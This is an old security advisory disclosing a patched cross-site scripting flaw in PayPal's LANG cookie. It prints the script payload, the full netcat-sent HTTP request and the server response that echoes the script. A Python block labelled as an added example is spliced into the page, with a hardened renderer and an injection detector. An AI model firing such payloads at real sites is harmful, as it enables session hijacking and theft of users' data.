<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7651.51">
<TITLE>[x0n3-h4ck.org] PayPal vulnerable to XSS</TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->
<BR>
<P><FONT SIZE=2>-=[--------------------ADVISORY-------------------]=-<BR>
<BR>
PayPal.com<BR>
<BR>
Author:CorryL x0n3-h4ck.org<BR>
-=[----------------------------------------------------]=-<BR>
<BR>
<BR>
-=[+] Application: PayPal.com<BR>
-=[+] Version: <BR>
-=[+] Vendor's URL: www.paypal.com<BR>
-=[+] Platform: Linux\Unix<BR>
-=[+] Bug type: XSS<BR>
-=[+] Exploitation: Remote/Local<BR>
-=[-]<BR>
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~<BR>
-=[+] Reference: www.x0n3-h4ck.org<BR>
-=[+] Virtual Office: <A HREF="http://www.kasamba.com/CorryL">http://www.kasamba.com/CorryL</A><BR>
<BR>
..::[ Description ]::..<BR>
<BR>
Founded in 1998, PayPal, an eBay Company, enables any individual or business with an email address to securely, easily and quickly send and receive payments online. PayPal's service builds on the existing financial infrastructure of bank accounts and credit cards and utilizes the world's most advanced proprietary fraud prevention systems to create a safe, global, real-time payment solution.<BR>
<BR>
PayPal has quickly become a global leader in online payment solutions with 100 million account members worldwide. Available in 103 countries and regions around the world, buyers and sellers on eBay, online retailers, online businesses, as well as traditional offline businesses are transacting with PayPal.<BR>
<BR>
<BR>
..::[ Proof Of Concept ]::..<BR>
<BR>
The problem lies in a variable contained in the cookies that are saved on the client system.<BR>
I used a small tool, "NetCat", to send the request containing the payload<BR>
to the web server, which allows the XSS.<BR>
<BR>
I used a line of code that pops up a small alert window<BR>
containing a number:<BR>
<BR>
<ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt><BR>
<BR>
I passed it in the LANG variable in this way:<BR>
<BR>
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt><BR>
<BR>
This is the complete request I sent to the web server, including the<BR>
code that triggers the XSS:<BR>
<BR>
GET / HTTP/1.0<BR>
Accept: */*<BR>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR<BR>
1.1.4322)<BR>
Host: www.paypal.com<BR>
Cookie:<BR>
cookie_check=yes;feel_cookie=6120302020622030202063203620776562736372206<BR>
4203020206520323120686F6D65706167652F486F6D65506167652E78736C20662030202<BR>
067203520656E5F55532068203020206920313920702F77656C2F696E6465782D6F75747<BR>
3696465206A203020206B2031362057656C636F6D65202D2050617950616C206C2030202<BR>
0;Apache=87%2E18%2E96%2E17%2E100421159849159546;KHcl0EuY7AKSMgfvHl7J5E7h<BR>
PtK=3pnRPwTbH4N6EEpxzwWWs3Mc2y2H-hH53D2MVeXyVDl4MsVrDF4cjRE3XSmD3RB714PL<BR>
N69ovbjK--4R;HaC80bwXscjqZ7KM6VOxULOB534=111-222-1933email@address.com;p<BR>
pip_signup=1;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;7aMa<BR>
j2jiaNMgvUAKlwbL1LlbnqC=BCRwX6rFzy8UFpNf7im0msjTqBkC71Yeq3U8IKjQG4zGrhRy<BR>
i5YDJ7sCXUdmJRHDye3Pjm;fL2JBKjxujhcE4LvqIWvGu9H2DC=r-h3XHZ9sxeAYLHHkSjI4<BR>
rXDaIB_JYsnEcx5svkMqiEPXWXCIaM-O-gNRkcj1K4tS5pPr4xtYC_3hZUBCMQ6b4xw8Tm;t<BR>
est_cookie=CheckForPermission;HumanClickID=-1902375092086;HumanClickACTI<BR>
VE=1159849210089;HumanClickKEY=2113911440409354850;BEGINREJECT=115984951<BR>
1214ENDREJECT<BR>
Connection: Close<BR>
Pragma: no-cache<BR>
<BR>
Below I paste the command used and the server's response:<BR>
<BR>
nc www.paypal.com 80 < prova.txt<BR>
<BR>
<BR>
HTTP/1.1 200 OK<BR>
Date: Fri, 06 Oct 2006 17:23:13 GMT<BR>
Server: Apache/1.3.33 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.22<BR>
OpenSSL/0.9.7e<BR>
Cache-Control: private<BR>
Expires: Thu, 05 Jan 1995 22:00:00 GMT<BR>
Pragma: no-cache<BR>
Set-Cookie:<BR>
feel_cookie=61203020206220302020632036207765627363722064203620776562<BR>
736372206520323120686F6D65706167652F486F6D65506167652E78736C20662032312<BR>
0686F6D65<BR>
706167652F486F6D65506167652E78736C2067203431202D2D3E3C536352695074200A0<BR>
D3E616C65<BR>
72742831323334353637383930293B3C2F5363526950743E2068203520656E5F5553206<BR>
920313920<BR>
702F77656C2F696E6465782D6F757473696465206A20313920702F77656C2F696E64657<BR>
82D6F7574<BR>
73696465206B203020206C2031362057656C636F6D65202D2050617950616C20;<BR>
expires=Sat, 0<BR>
6-Oct-2007 17:23:14 GMT; path=/; domain=.paypal.com<BR>
Set-Cookie: Apache=87.18.110.213.321561160155393836; path=/;<BR>
expires=Sun, 28-Sep<BR>
-36 17:23:13 GMT<BR>
Connection: close<BR>
Content-Type: text/html; charset=UTF-8<BR>
<BR>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><BR>
<html><BR>
<head><BR>
<!--<BR>
Script info: script: webscr, cmd: , template: p/wel/index-outside,<BR>
date: Oct.<BR>
3, 2006 12:18:04 PDT; country: US, language: --><ScRiPt>alert(1234567890);</ScRiPt><BR>
web version: 42.0-255538 branch: live-420_int<BR>
content version: 42.0-249796 branch: live-420_int<BR>
--><BR>
<title>PayPal - Abort</title><BR>
<BR>
As can be seen, the server responds with the line of<BR>
code inserted into the page output, which causes the alert<BR>
window to open.<BR>
<BR>
<BR>
We can save the server's response as an HTML file<BR>
and open it with any browser to confirm what I have described,<BR>
again using NetCat, in this way:<BR>
<BR>
nc www.paypal.com 80 < test.txt > aaa.html<BR>
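The following Python is an added example and not part of the advisory: it reproduces the flaw described above (the LANG cookie value copied verbatim into an HTML comment, so a value beginning with --> closes the comment and injects markup), shows a hardened rendering that allowlists the language value, and flags a Cookie header carrying such a value. The allowlist, function names and the trimmed sample Cookie header are constructed for this example.<BR>

```python
import html
import re

# Constructed allowlist of language codes the site legitimately accepts;
# en_US is the only value visible in the advisory's traffic.
ALLOWED_LANGS = {"en_US", "en_GB", "de_DE", "fr_FR", "it_IT"}

# Patterns matching the advisory's payload: a comment break-out ("-->")
# followed by a tag, or a script tag in any letter case.
COMMENT_BREAKOUT = re.compile(r"-->\s*<", re.IGNORECASE)
SCRIPT_TAG = re.compile(r"<\s*script", re.IGNORECASE)


def parse_cookie_header(header: str) -> dict:
    """Split a raw Cookie header value into name -> value (no URL decoding)."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


def render_script_info_vulnerable(lang: str) -> str:
    """Mirrors the advisory: the cookie value lands verbatim inside an HTML comment."""
    return "<!-- Script info: language: %s -->" % lang


def render_script_info_hardened(lang: str) -> str:
    """Allowlist the language, fall back to en_US, and escape before output.

    The allowlist is what prevents '--' or '>' from ever reaching the comment;
    html.escape alone would not neutralise '-->' inside a comment.
    """
    if lang not in ALLOWED_LANGS:
        lang = "en_US"
    return "<!-- Script info: language: %s -->" % html.escape(lang)


def flag_suspicious_cookies(header: str) -> list:
    """Return the cookie names whose values look like an HTML/script injection."""
    flagged = []
    for name, value in parse_cookie_header(header).items():
        if COMMENT_BREAKOUT.search(value) or SCRIPT_TAG.search(value):
            flagged.append(name)
    return flagged


# Constructed sample: a trimmed version of the advisory's Cookie header.
SAMPLE_COOKIE = ("cookie_check=yes;LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>;"
                 "ppip_signup=1")
```

Run flag_suspicious_cookies over the Cookie header of each incoming request to log injection attempts against this cookie, and use the hardened renderer on the server side.<BR>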
<BR>
<BR>
<BR>
<BR>
..::[ Disclosure Timeline ]::..<BR>
<BR>
[04/10/2006] - Vendor notification<BR>
[08/10/2006] - Vendor Response<BR>
[18/10/2006] - Patch release from vendor<BR>
[04/11/2006] - Public disclosure<BR>
<BR>
<BR>
<BR>
</FONT>
</P>
</BODY>
</HTML>